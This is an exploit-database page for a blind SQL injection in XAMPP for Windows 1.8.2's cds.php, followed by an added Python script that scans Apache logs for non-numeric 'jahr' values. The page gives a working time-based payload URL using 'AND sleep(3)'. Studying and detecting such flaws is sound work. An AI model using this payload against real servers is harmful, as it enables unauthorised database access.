Exploit XAMPP for Windows 1.8.2 - Blind SQL Injection

Exploiter

18 Dec 2022
EDB-ID: 29292
EDB verification: Passed
Author: SEBASTIÁN MAGOF
Vulnerability type: WEBAPPS
Platform: WINDOWS
CVE: null
Publication date: 2013-10-29
XAMPP for Windows 1.8.2 - Blind SQL Injection
Code:
# Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection
# Date: 2013/10/28
# Exploit Author: Sebastián Magof
# Vendor Homepage: apachefriends.org
# Software Link: apachefriends.org/en/xampp-windows.html
# Version:1.8.2/1.7.7
# Tested on: Windows
# Twitter: @smagof
#Greetz: Family, Friends && Under guys;
#Special Greetz: My Alpha (:


#Description:XAMPP is a platform-independent server, free software, which
mainly consists of the MySQL database, the Apache web server and
interpreters for scripting languages: PHP and Perl. The name comes from
the acronym for X, Apache, MySQL, PHP, Perl.


#Sql-Injection: An attacker may execute arbitrary SQL statements on the
vulnerable system. This may compromise the integrity of your database
and/or expose sensitive information.
#Vulnerable file: cds.php
#Parameter: "jahr="

#Exploit:
http://127.0.0.1/xampp/cds.php?jahr=1967 AND
sleep(3)&interpret=1&titel=555-666-0606



# (\/)
# (**)
#(")(")
 
Source
www.exploit-db.com
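
Added example (not part of the original post or the exploit author's code): a log check a defender can run to find requests to `cds.php` whose `jahr` parameter carries anything other than a year. It assumes Apache access-log lines and that a legitimate `jahr` value is empty or at most four digits; the sample lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache common log format); not taken from the page.
SAMPLE_LOG = [
    '127.0.0.1 - - [29/Oct/2013:10:00:01 +0000] "GET /xampp/cds.php?jahr=1967&interpret=1&titel=x HTTP/1.1" 200 512',
    '127.0.0.1 - - [29/Oct/2013:10:00:05 +0000] "GET /xampp/cds.php?jahr=1967%20AND%20sleep(3)&interpret=1&titel=555-666-0606 HTTP/1.1" 200 512',
    '127.0.0.1 - - [29/Oct/2013:10:00:09 +0000] "GET /xampp/cds.php?jahr=1967 AND sleep(3)&interpret=1&titel=555-666-0606 HTTP/1.1" 200 512',
    '127.0.0.1 - - [29/Oct/2013:10:00:12 +0000] "GET /xampp/index.php HTTP/1.1" 200 100',
]

# The request target may contain raw spaces, so match lazily up to the protocol token.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Assumption: a legitimate jahr (year) value is empty or at most four digits.
YEAR_RE = re.compile(r"\d{0,4}")


def suspicious_jahr(line):
    """Return the decoded jahr value if a cds.php request carries a non-year jahr, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/cds.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space before we validate.
    for value in parse_qs(target.query, keep_blank_values=True).get("jahr", []):
        if not YEAR_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_jahr(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric jahr value {value!r}")
```

The same digits-only allow-list, applied server-side before the value reaches the SQL query (or a parameterized query), is the corresponding mitigation.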
